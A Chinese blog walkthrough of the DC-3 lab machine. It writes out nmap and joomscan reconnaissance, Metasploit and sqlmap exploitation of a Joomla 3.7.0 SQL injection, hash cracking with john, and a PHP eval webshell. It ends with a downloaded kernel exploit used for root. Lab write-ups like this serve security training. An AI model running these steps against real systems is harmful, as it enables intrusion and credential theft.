DC-3 靶场记录

arp-scan -l

在这里插入图片描述
得到靶机ip 192.168.179.145
进行nmap扫描

nmap -sT --min-rate 10000 192.168.179.145
nmap -sT -sC -sV -O -p80 192.168.179.145
nmap --script-vuln -p80 192.168.179.145

在这里插入图片描述
在这里插入图片描述
打开80端口
在这里插入图片描述
通过Wappalyzer火狐插件得知CMS为Joomla,
利用Joomla的扫描器进行扫描.

joomscan -u http://192.168.179.145

在这里插入图片描述
成功拿到一个登录界面
在这里插入图片描述

方法1:使用msf

用msf扫描一下是否有joomla 3.7.0 的漏洞

msfconsole
search joomla 3.7.0
use 0
options
set RHOSTS 靶机ip
run

在这里插入图片描述
在这里插入图片描述
按道理来说这里应该已经可以直接进入了,但是我这里出现了错误,
提示[-] Exploit aborted due to failure: unknown: 192.168.179.145:80: No logged-in Administrator or Super User user found!
然后过了一会重新试了一下又可以了(要在/administrator登录后才能直接进入)
在这里插入图片描述
成功拿到www-root

方法2:使用searchsploit(需要爆破数据库获得admin的密码)

searchsploit joomla 3.7.0
searchsploit -p 42033.txt //-p显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt ./
//将42033.txt放在当前目录下

在这里插入图片描述
在这里插入图片描述
(其实和msf使用的漏洞是同一个,但是不知道为什么msf那边不能正常利用)
根据42033.txt这个文档可以清楚看到

Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
//我们稍作修改,将localhost改为靶机的ip。

在这里插入图片描述
暴库
在这里插入图片描述

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
//跟撞库的url只在末尾加了 -D joomla --tables

在这里插入图片描述
再爆_users的字段

sqlmap -u "http://192.168.179.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables -T "#__users" --columns
//同理,只在爆表的url后面加入了 -T "#__users" --columns

在这里插入图片描述
爆内容

sqlmap -u "http://192.168.179.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables -T "#__users" -C "username,password" --dump

在这里插入图片描述
将admin的密码hash值存进1.txt中,用john进行破解

john 1.txt --wordlist /usr/share/wordlists/rockyou.txt
john 1.txt --show

在这里插入图片描述
得到用户admin 密码snoopy
成功登录
在这里插入图片描述
找到可以文件上传的页面
在这里插入图片描述
将一句话木马写入index.php中

<?php @eval($_POST['a']);?>

在这里插入图片描述
打开蚁剑进行连接
在这里插入图片描述
在这里插入图片描述
连接成功。
在这里插入图片描述
使用蚁剑的虚拟终端进行操作。

提权

先查看一下/etc/passwd和/etc/crontab这两个文件
在这里插入图片描述
没有什么可以利用的信息
尝试通过系统漏洞提权
cat /etc/issue 查看操作系统版本
在这里插入图片描述
searchsploit Ubuntu 16.04
在这里插入图片描述
使用39772.txt
查看文档,最后一行有exp的链接
wget下载下来后解压

python -m http.server 8080
//开启http服务

在这里插入图片描述
进入39772/,复制exploit.tar连接地址
在这里插入图片描述
然后在靶机中下载并解压
在这里插入图片描述
解压后进入ebpf_mapfd_doubleput_exploit/文件夹后依次执行compile.sh和doubleput.sh两个文件

./compile.sh
./doubleput.sh

在这里插入图片描述
成功提权
定妆照
[外链图片转存失败,源站可能有防盗在这里插入!链机制,建描述]议将图片上https://传(imblog.csdgg.cn/58cb59551e2a0OIr4fc09751f42e940532e.png67)(https://img-blog.csdnimg.cn/58cb59551e2a4fc09751f42e9402132e.png)]

总结:
1、通过Wappalyzer插件发现CMS为joomla,使用joomscan成功拿到一个administrator的登录界面。
2、使用searchsploit对joomla 3.7.0进行搜索,搜索到一个漏洞CVE-2017-8917,查看文档可以看到它提示我们使用sqlmap并提供了url。
3、通过sqlmap一步步爆破出数据库、表名、以及表的内容,最后发现admin和admin的hash密码,通过john暴力破解hash密码得到
密码为snoopy(同样可以利用burpsuite爆破administrator页面来获取admin的密码)。
4、登录administrator后
方法一:直接使用msf拿到shell。
方法二:在进入administrator后找到可以文件上传的地方,传入一句话木马,用蚁剑进行连接,拿到shell。
5、利用Ubuntu 16.0的内核漏洞进行提权。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值